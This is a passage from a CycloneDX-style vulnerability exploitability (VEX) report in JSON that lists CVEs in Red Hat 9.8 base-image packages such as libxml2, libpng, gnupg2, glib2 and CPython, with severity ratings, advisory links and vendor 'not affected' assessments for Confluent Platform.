          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-27113",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "libxml2 before 2.12.10 and 2.13.x before 2.13.6 has a NULL pointer dereference in xmlPatMatch in pattern.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-27113"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/12"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/13"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/4"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/5"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/8"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-27113"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/861"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00028.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27113"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250306-0004/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7302-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-27113"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2025/02/18/2"
        }
      ],
      "published": "2025-02-18T23:15:10+00:00",
      "updated": "2026-06-17T09:03:03+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.9.13-14.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-28164",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        401,
        120
      ],
      "description": "Buffer Overflow vulnerability in libpng 1.6.43-1.6.46 allows a local attacker to cause a denial of service via png_create_read_struct() function.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-28164"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-28164"
        },
        {
          "url": "https://gist.github.com/kittener/506516f8c22178005b4379c8b2a7de20"
        },
        {
          "url": "https://github.com/pnggroup/libpng/issues/655"
        },
        {
          "url": "https://github.com/pnggroup/libpng/pull/657"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-28164"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7993-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-28164"
        }
      ],
      "published": "2026-01-27T16:16:14+00:00",
      "updated": "2026-06-17T09:04:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.6.37-15.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-30258",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        754
      ],
      "description": "In GnuPG before 2.5.5, if a user chooses to import a certificate with certain crafted subkey data that lacks a valid backsig or that has incorrect usage flags, the user loses the ability to verify signatures made from certain other signing keys, aka a \"verification DoS.\"",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-30258"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-30258"
        },
        {
          "url": "https://dev.gnupg.org/T7527"
        },
        {
          "url": "https://dev.gnupg.org/rG48978ccb4e20866472ef18436a32744350a65158"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gnupg-announce/2025q1/000491.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30258"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7412-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7412-3"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-30258"
        }
      ],
      "published": "2025-03-19T20:15:20+00:00",
      "updated": "2026-06-17T09:08:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.3.3-5.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-3360",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A flaw was found in GLib. An integer overflow and buffer under-read occur when parsing a long invalid ISO 8601 timestamp with the g_date_time_new_from_iso8601() function.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-3360"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-3360"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2357754"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3647"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/work_items/3647"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00024.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3360"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-3360"
        }
      ],
      "published": "2025-04-07T13:15:43+00:00",
      "updated": "2026-06-30T15:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-4516",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        416
      ],
      "description": "There is an issue in CPython when using `bytes.decode(\"unicode_escape\", error=\"ignore|replace\")`. If you are not using the \"unicode_escape\" encoding or an error handler your usage is not affected. To work-around this issue you may stop using the error= handler and instead wrap the bytes.decode() call in a try-except catching the DecodeError.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-4516"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/16/4"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/19/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:23530"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-4516"
        },
        {
          "url": "https://bugzilla.redhat.com/2294682"
        },
        {
          "url": "https://bugzilla.redhat.com/2321440"
        },
        {
          "url": "https://bugzilla.redhat.com/2325776"
        },
        {
          "url": "https://bugzilla.redhat.com/2343237"
        },
        {
          "url": "https://bugzilla.redhat.com/2366509"
        },
        {
          "url": "https://bugzilla.redhat.com/2370010"
        },
        {
          "url": "https://bugzilla.redhat.com/2370014"
        },
        {
          "url": "https://bugzilla.redhat.com/2370016"
        },
        {
          "url": "https://bugzilla.redhat.com/2372426"
        },
        {
          "url": "https://bugzilla.redhat.com/2373234"
        },
        {
          "url": "https://bugzilla.redhat.com/2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294682"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2321440"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2325776"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2343237"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2366509"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370010"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370014"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370016"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2372426"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373234"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11168"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5642"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9287"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0938"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4138"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4330"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4435"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4516"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4517"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6069"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8291"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2025-23530.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:23530"
        },
        {
          "url": "https://github.com/python/cpython/commit/4398b788ffc1f954a2c552da285477d42a571292"
        },
        {
          "url": "https://github.com/python/cpython/commit/5646648678295a44aa82636c6e92826651baf33a"
        },
        {
          "url": "https://github.com/python/cpython/commit/6279eb8c076d89d3739a6edb393e43c7929b429d"
        },
        {
          "url": "https://github.com/python/cpython/commit/69b4387f78f413e8c47572a85b3478c47eba8142"
        },
        {
          "url": "https://github.com/python/cpython/commit/73b3040f592436385007918887b7e2132aa8431f"
        },
        {
          "url": "https://github.com/python/cpython/commit/8d35fd1b34935221aff23a1ab69a429dd156be77"
        },
        {
          "url": "https://github.com/python/cpython/commit/9f69a58623bd01349a18ba0c7a9cb1dad6a51e8e"
        },
        {
          "url": "https://github.com/python/cpython/commit/9f69a58623bd01349a18ba0c7a9cb1dad6a51e8e%20%28main%29"
        },
        {
          "url": "https://github.com/python/cpython/commit/ab9893c40609935e0d40a6d2a7307ea51aec598b"
        },
        {
          "url": "https://github.com/python/cpython/issues/133767"
        },
        {
          "url": "https://github.com/python/cpython/pull/129648"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-4516.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-23530.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L75IPBBTSCYEF56I2M4KIW353BB3AY74/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4516"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7570-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-4516"
        }
      ],
